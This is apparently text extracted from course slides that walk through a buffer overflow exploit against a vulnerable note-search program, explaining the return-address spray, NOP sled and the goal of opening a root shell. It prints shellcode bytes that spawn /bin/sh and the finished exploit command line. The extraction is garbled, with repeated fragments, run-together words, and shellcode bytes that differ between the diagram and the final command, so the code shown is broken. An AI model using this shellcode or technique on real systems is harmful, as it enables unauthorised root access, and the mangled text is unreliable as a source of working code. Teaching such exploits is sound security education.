buffer overflow walk-through

Buffer Overflow Walk-Through

The Code

Change name of notesearch program in our exploit code to match course naming

convention

strcpy(command, “./bettersearchnote.exe\’”);

bettersearchnote.exe

16

Change name of notesearch program in our exploit code to match course name in

convention

Normally, Jose runs bettersearchnote program to search for notes with keywords

of his choosing

jose@EC310-VM $ ./ bettersearchnote.exe “Life”Life is Beautiful

The exploit program is crafted to run the program on his behalf, using the function

“system()”

jose@EC310-VM $ lsunix_basics booksrc work desktop ec310code

For example system(“ls”) would list the content of the current directory as though it was run from the command line

} like this except no one ever enters this at the command prompt

The exploit program is crafted to run the program on his behalf, using the function

“system()”

jose@EC310-VM $ ./system_example.exeunix_basics booksrc work desktop ec310code

#include…int main() {

system(“ls”);

}

system_example.c

Now, lets look at what the exploit program does…Standard

inclusion of C libraries

The goal of our exploit program is to open a root shell

This is machine language that opens a shell prompt for the user running the program

First, the set-up…

This is the standard way to start a program and take in command line arguments… But you already knew that

iptrretoffset 270commandbuffer

Building the stack…

These lines declare the variables to be used in the program

Variables are placed on the stack for the main function

IntegerAddressIntegerIntegerAddressAddress

Allocating memory on the heap for our string command, which will be called by the function

system() .

Allocates 200 bytes on the heap for the string command

200 Bytes

iptrretoffset 270

command &commandbuffer

The address of this location on the heap becomes the value of the pointercommand

0x__

This string will eventually be run with the function system()

00 00 00 00 00 00 00 00

00 00 00 0000 00 00 00

00 00 00 00 00 00 00 0000 00 00 0000 00 00 00

Allocating memory on the heap for our string command, which will be called by the

function system().The bzero function places 200 0x00’s starting at the location to which command points

200 Bytes

iptrretoffset 270command &command

buffer

. / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

00 00 00 0000 00 00 00

00 00 00 00 00 00 00 0000 00 00 0000 00 00 00

Building the String command

This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointercommand

iptrretoffset 270command &commandbuffer

This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell


Next we need to find the address where the command line arguments for bettersearchnote will start!

24

Take the number of bytes in the current string command, until the null terminator (24 bytes). Add this to the address pointed to by the variable command and store that address in the pointer buffer.

&command

+

iptrretoffset 270command &commandbuffer

Bytes


Specifying our custom return address

This takes the command line argument to create our own custom offset value, but it is not used.

iptrretoffset 270command &commandbuffer &command+24


command &commandoffset 270

, this value represents the address of our desired shell code execution entry point.

Specifying our custom return address

This takes the address of iand subtracts the value of offset.This value is placed in the variable ret

&i

- 270

iptrret

buffer &command+24

. / b e t t e r s e a r c h n o t e . e x e . ‘ 00 00 00 00 00 00 00 00 00 00 00 00

And place enough copies of our custom return address in the buffer to overwrite the original return

address.

Takes the address contained in ret and places it in the address pointed to by the buffer.

This repeats every 4 bytes for 40 iterations.

iptr

offset 270command &command

&i - 270&i - 270&i - 270ret &i-270

buffer &command+24

Now the entire heap looks like this

. / b et t e rs e a rc h n ot e . ex e '

&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270

0x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00

. / b e t t e r s e a r c h n o t e . e x e . ‘

&I - 270&I - 270&i - 270

ret 0x I – addr - 270&i - 270&i - 270&i - 270&i - 270&i - 270

0x90

Next create a buffer of filler commands, called NOPs, to help find the shell code

memset() sets a byte in memory to the value specified.In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well.

0x90 is machine code for “No Operation,” Which literally means do nothing.

0x900x900x90


iptrret &i-270

buffer &command+24

0x900x900x900x90



0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90

&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270


NOP sled

Copies the shell code into memory after the NOP sled

. / b e t t e r s e a r c h n o t e . e x e . ‘ 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90

ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270

Then place our shell code into the buffer immediately following the NOPs


iptrret &i-270

buffer &command+24



0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret

&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270


With the newly inserted shell code here








' 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00

Concatenates a single quote at the end of the stringcommand

Close the string command with a quote so it is ready to be run by the function system()

‘

Now the string command is finished and ready for execution.

jose@EC310-VM $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’




‘ 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00





exploit_notesearch

searchstring

fd printing

user id sfp

return address

bettersearchnote.exe

100 characters allotted to searchstring by bettersearchnote.exe

exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space.

Ensuring one of our custom return addresses replaces the original return address





buffer overflow walk-through

Documents

bettersearchnote program

b e t t e r s e

exploit code

notesearch program

current string command

source code picture

function system jose

malicious code